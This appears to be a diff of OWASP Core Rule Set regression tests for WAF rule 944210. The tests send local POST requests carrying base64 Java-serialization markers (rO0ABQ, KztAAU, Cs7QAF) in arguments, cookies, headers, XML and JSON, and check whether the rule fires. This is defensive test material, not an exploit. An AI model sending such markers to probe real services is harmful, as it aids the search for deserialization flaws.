Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: "Content-Type application/json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-14 + desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-1 - desc: "Argument name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-2 - desc: "Cookie test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-3 - desc: "Cookie name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-4 - desc: "Request header test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-26 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-28 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-5 - desc: "XML element includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-6 - desc: "XML attribute name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-7 - desc: "XML attribute value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-8 - desc: "XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Cookie name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type application/json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-9 - desc: "Nested XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-10 - desc: "Content-Type text/plain includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 